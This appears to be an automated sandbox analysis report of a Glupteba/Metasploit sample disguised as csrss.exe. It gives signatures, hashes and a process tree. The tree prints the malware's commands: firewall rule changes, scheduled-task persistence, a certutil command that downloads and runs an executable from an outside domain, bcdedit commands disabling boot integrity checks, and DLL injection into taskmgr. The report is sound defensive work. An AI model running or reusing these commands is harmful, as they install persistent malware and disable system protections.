Resubmissions

02-09-2022 02:49

220902-dbgmjafabp 10

02-09-2022 02:36

220902-c3scnshbc7 10

12-08-2022 07:02

220812-httr2aceh7 10

Analysis

  • max time kernel
    150s
  • max time network
    161s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    02-09-2022 02:36

General

  • Target

    csrss.exe

  • Size

    4.5MB

  • MD5

    2f29ebdaf7b3395ebdadb13f453177c7

  • SHA1

    20913d2d3c145adf43af7f13108cd1eb974862ca

  • SHA256

    5d856f4c0a6a3d6a13cc4b0786328e49511923b3ca208d93010c8e6b122bc708

  • SHA512

    27c258f7f4f9add24666daadf62008bff00f224723623b0463a9d455254cfcbbbcda92488530dcb41a3fad0d688c15630e0d8eda3c6fce031db1a91fc9e03ce7

  • SSDEEP

    98304:477X24Nev1+NrGJ4FSBiD+Fon/wpCmreluztZi3:kX243NrGk+F+/wYmt

Malware Config

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 7 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Windows security bypass 2 TTPs 9 IoCs
  • Modifies boot configuration data using bcdedit 14 IoCs
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 4 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Possible attempt to disable PatchGuard 2 TTPs

    Rootkits can use kernel patching to embed themselves in an operating system.

  • Loads dropped DLL 13 IoCs
  • Windows security modification 2 TTPs 9 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in Windows directory 3 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 7 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 35 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 62 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\csrss.exe
    "C:\Users\Admin\AppData\Local\Temp\csrss.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:2008
    • C:\Users\Admin\AppData\Local\Temp\csrss.exe
      "C:\Users\Admin\AppData\Local\Temp\csrss.exe"
      2⤵
      • Windows security bypass
      • Loads dropped DLL
      • Windows security modification
      • Adds Run key to start application
      • Drops file in Windows directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:1376
      • C:\Windows\system32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1984
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
          4⤵
          • Modifies Windows Firewall
          • Modifies data under HKEY_USERS
          PID:1116
      • C:\Windows\rss\csrss.exe
        C:\Windows\rss\csrss.exe ""
        3⤵
        • Drops file in Drivers directory
        • Executes dropped EXE
        • Loads dropped DLL
        • Modifies data under HKEY_USERS
        • Modifies system certificate store
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1696
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
          4⤵
          • Creates scheduled task(s)
          PID:1472
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://spolaect.info/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
          4⤵
          • Creates scheduled task(s)
          PID:1060
        • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
          "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Modifies system certificate store
          • Suspicious use of WriteProcessMemory
          PID:1808
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1644
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1960
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:988
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1524
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1864
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1400
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1704
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:828
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:964
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1496
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1560
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -timeout 0
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1484
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1716
        • C:\Windows\system32\bcdedit.exe
          C:\Windows\Sysnative\bcdedit.exe /v
          4⤵
          • Modifies boot configuration data using bcdedit
          PID:1108
        • C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
          C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
          4⤵
          • Executes dropped EXE
          PID:900
        • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
          C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
          4⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          PID:1600
  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    PID:1444
  • C:\Windows\system32\makecab.exe
    "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20220902043701.log C:\Windows\Logs\CBS\CbsPersist_20220902043701.cab
    1⤵
    • Drops file in Windows directory
    PID:1380
  • C:\Windows\explorer.exe
    "C:\Windows\explorer.exe"
    1⤵
      PID:1100
    • C:\Windows\System32\control.exe
      "C:\Windows\System32\control.exe" SYSTEM
      1⤵
        PID:964
      • C:\Windows\SysWOW64\DllHost.exe
        C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}
        1⤵
          PID:1864

        Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
          Filesize

          94KB

          MD5

          d98e78fd57db58a11f880b45bb659767

          SHA1

          ab70c0d3bd9103c07632eeecee9f51d198ed0e76

          SHA256

          414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0

          SHA512

          aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831

        • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
          Filesize

          281KB

          MD5

          d98e33b66343e7c96158444127a117f6

          SHA1

          bb716c5509a2bf345c6c1152f6e3e1452d39d50d

          SHA256

          5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1

          SHA512

          705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

        • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
          Filesize

          1.7MB

          MD5

          13aaafe14eb60d6a718230e82c671d57

          SHA1

          e039dd924d12f264521b8e689426fb7ca95a0a7b

          SHA256

          f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

          SHA512

          ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

        • C:\Windows\rss\csrss.exe
          Filesize

          4.5MB

          MD5

          2f29ebdaf7b3395ebdadb13f453177c7

          SHA1

          20913d2d3c145adf43af7f13108cd1eb974862ca

          SHA256

          5d856f4c0a6a3d6a13cc4b0786328e49511923b3ca208d93010c8e6b122bc708

          SHA512

          27c258f7f4f9add24666daadf62008bff00f224723623b0463a9d455254cfcbbbcda92488530dcb41a3fad0d688c15630e0d8eda3c6fce031db1a91fc9e03ce7

        • C:\Windows\rss\csrss.exe
          Filesize

          4.5MB

          MD5

          2f29ebdaf7b3395ebdadb13f453177c7

          SHA1

          20913d2d3c145adf43af7f13108cd1eb974862ca

          SHA256

          5d856f4c0a6a3d6a13cc4b0786328e49511923b3ca208d93010c8e6b122bc708

          SHA512

          27c258f7f4f9add24666daadf62008bff00f224723623b0463a9d455254cfcbbbcda92488530dcb41a3fad0d688c15630e0d8eda3c6fce031db1a91fc9e03ce7

        • \Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
          Filesize

          94KB

          MD5

          d98e78fd57db58a11f880b45bb659767

          SHA1

          ab70c0d3bd9103c07632eeecee9f51d198ed0e76

          SHA256

          414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0

          SHA512

          aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831

        • \Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
          Filesize

          281KB

          MD5

          d98e33b66343e7c96158444127a117f6

          SHA1

          bb716c5509a2bf345c6c1152f6e3e1452d39d50d

          SHA256

          5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1

          SHA512

          705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

        • \Users\Admin\AppData\Local\Temp\csrss\patch.exe
          Filesize

          1.7MB

          MD5

          13aaafe14eb60d6a718230e82c671d57

          SHA1

          e039dd924d12f264521b8e689426fb7ca95a0a7b

          SHA256

          f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

          SHA512

          ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

        • \Users\Admin\AppData\Local\Temp\dbghelp.dll
          Filesize

          1.5MB

          MD5

          f0616fa8bc54ece07e3107057f74e4db

          SHA1

          b33995c4f9a004b7d806c4bb36040ee844781fca

          SHA256

          6e58fcf4d763022b1f79a3c448eb2ebd8ad1c15df3acf58416893f1cbc699026

          SHA512

          15242e3f5652d7f1d0e31cebadfe2f238ca3222f0e927eb7feb644ab2b3d33132cf2316ee5089324f20f72f1650ad5bb8dd82b96518386ce5b319fb5ceb8313c

        • \Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
          Filesize

          5.3MB

          MD5

          1afff8d5352aecef2ecd47ffa02d7f7d

          SHA1

          8b115b84efdb3a1b87f750d35822b2609e665bef

          SHA256

          c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1

          SHA512

          e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

        • \Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
          Filesize

          5.3MB

          MD5

          1afff8d5352aecef2ecd47ffa02d7f7d

          SHA1

          8b115b84efdb3a1b87f750d35822b2609e665bef

          SHA256

          c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1

          SHA512

          e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

        • \Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
          Filesize

          5.3MB

          MD5

          1afff8d5352aecef2ecd47ffa02d7f7d

          SHA1

          8b115b84efdb3a1b87f750d35822b2609e665bef

          SHA256

          c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1

          SHA512

          e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

        • \Users\Admin\AppData\Local\Temp\osloader.exe
          Filesize

          591KB

          MD5

          e2f68dc7fbd6e0bf031ca3809a739346

          SHA1

          9c35494898e65c8a62887f28e04c0359ab6f63f5

          SHA256

          b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4

          SHA512

          26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

        • \Users\Admin\AppData\Local\Temp\osloader.exe
          Filesize

          591KB

          MD5

          e2f68dc7fbd6e0bf031ca3809a739346

          SHA1

          9c35494898e65c8a62887f28e04c0359ab6f63f5

          SHA256

          b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4

          SHA512

          26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

        • \Users\Admin\AppData\Local\Temp\osloader.exe
          Filesize

          591KB

          MD5

          e2f68dc7fbd6e0bf031ca3809a739346

          SHA1

          9c35494898e65c8a62887f28e04c0359ab6f63f5

          SHA256

          b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4

          SHA512

          26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

        • \Users\Admin\AppData\Local\Temp\symsrv.dll
          Filesize

          163KB

          MD5

          5c399d34d8dc01741269ff1f1aca7554

          SHA1

          e0ceed500d3cef5558f3f55d33ba9c3a709e8f55

          SHA256

          e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f

          SHA512

          8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d

        • \Windows\rss\csrss.exe
          Filesize

          4.5MB

          MD5

          2f29ebdaf7b3395ebdadb13f453177c7

          SHA1

          20913d2d3c145adf43af7f13108cd1eb974862ca

          SHA256

          5d856f4c0a6a3d6a13cc4b0786328e49511923b3ca208d93010c8e6b122bc708

          SHA512

          27c258f7f4f9add24666daadf62008bff00f224723623b0463a9d455254cfcbbbcda92488530dcb41a3fad0d688c15630e0d8eda3c6fce031db1a91fc9e03ce7

        • \Windows\rss\csrss.exe
          Filesize

          4.5MB

          MD5

          2f29ebdaf7b3395ebdadb13f453177c7

          SHA1

          20913d2d3c145adf43af7f13108cd1eb974862ca

          SHA256

          5d856f4c0a6a3d6a13cc4b0786328e49511923b3ca208d93010c8e6b122bc708

          SHA512

          27c258f7f4f9add24666daadf62008bff00f224723623b0463a9d455254cfcbbbcda92488530dcb41a3fad0d688c15630e0d8eda3c6fce031db1a91fc9e03ce7

        • memory/828-107-0x0000000000000000-mapping.dmp
        • memory/900-115-0x0000000000000000-mapping.dmp
        • memory/964-108-0x0000000000000000-mapping.dmp
        • memory/988-102-0x0000000000000000-mapping.dmp
        • memory/1100-60-0x000007FEFB871000-0x000007FEFB873000-memory.dmp
          Filesize

          8KB

        • memory/1108-113-0x0000000000000000-mapping.dmp
        • memory/1116-75-0x0000000000000000-mapping.dmp
        • memory/1376-71-0x0000000000400000-0x0000000000D41000-memory.dmp
          Filesize

          9.3MB

        • memory/1376-69-0x0000000002760000-0x0000000002B9C000-memory.dmp
          Filesize

          4.2MB

        • memory/1376-66-0x0000000002760000-0x0000000002B9C000-memory.dmp
          Filesize

          4.2MB

        • memory/1376-81-0x0000000000400000-0x0000000000D41000-memory.dmp
          Filesize

          9.3MB

        • memory/1400-105-0x0000000000000000-mapping.dmp
        • memory/1444-64-0x000000005FFF0000-0x0000000060000000-memory.dmp
          Filesize

          64KB

        • memory/1444-68-0x000000006C481000-0x000000006C483000-memory.dmp
          Filesize

          8KB

        • memory/1444-65-0x0000000071F5D000-0x0000000071F68000-memory.dmp
          Filesize

          44KB

        • memory/1444-58-0x000000002F271000-0x000000002F274000-memory.dmp
          Filesize

          12KB

        • memory/1444-93-0x0000000071F5D000-0x0000000071F68000-memory.dmp
          Filesize

          44KB

        • memory/1444-59-0x0000000070F71000-0x0000000070F73000-memory.dmp
          Filesize

          8KB

        • memory/1444-61-0x0000000075FC1000-0x0000000075FC3000-memory.dmp
          Filesize

          8KB

        • memory/1444-63-0x000000006C781000-0x000000006C783000-memory.dmp
          Filesize

          8KB

        • memory/1484-111-0x0000000000000000-mapping.dmp
        • memory/1496-109-0x0000000000000000-mapping.dmp
        • memory/1524-103-0x0000000000000000-mapping.dmp
        • memory/1560-110-0x0000000000000000-mapping.dmp
        • memory/1600-118-0x0000000000000000-mapping.dmp
        • memory/1644-100-0x0000000000000000-mapping.dmp
        • memory/1696-84-0x00000000025E0000-0x0000000002A1C000-memory.dmp
          Filesize

          4.2MB

        • memory/1696-82-0x00000000025E0000-0x0000000002A1C000-memory.dmp
          Filesize

          4.2MB

        • memory/1696-79-0x0000000000000000-mapping.dmp
        • memory/1696-96-0x0000000000400000-0x0000000000D41000-memory.dmp
          Filesize

          9.3MB

        • memory/1696-85-0x0000000000400000-0x0000000000D41000-memory.dmp
          Filesize

          9.3MB

        • memory/1704-106-0x0000000000000000-mapping.dmp
        • memory/1716-112-0x0000000000000000-mapping.dmp
        • memory/1808-94-0x0000000140000000-0x00000001405E8000-memory.dmp
          Filesize

          5.9MB

        • memory/1864-104-0x0000000000000000-mapping.dmp
        • memory/1960-101-0x0000000000000000-mapping.dmp
        • memory/1984-73-0x0000000000000000-mapping.dmp
        • memory/2008-62-0x0000000000400000-0x0000000000D41000-memory.dmp
          Filesize

          9.3MB

        • memory/2008-56-0x0000000002BA0000-0x00000000034C6000-memory.dmp
          Filesize

          9.1MB

        • memory/2008-57-0x0000000000400000-0x0000000000D41000-memory.dmp
          Filesize

          9.3MB

        • memory/2008-54-0x0000000002760000-0x0000000002B9C000-memory.dmp
          Filesize

          4.2MB

        • memory/2008-55-0x0000000002760000-0x0000000002B9C000-memory.dmp
          Filesize

          4.2MB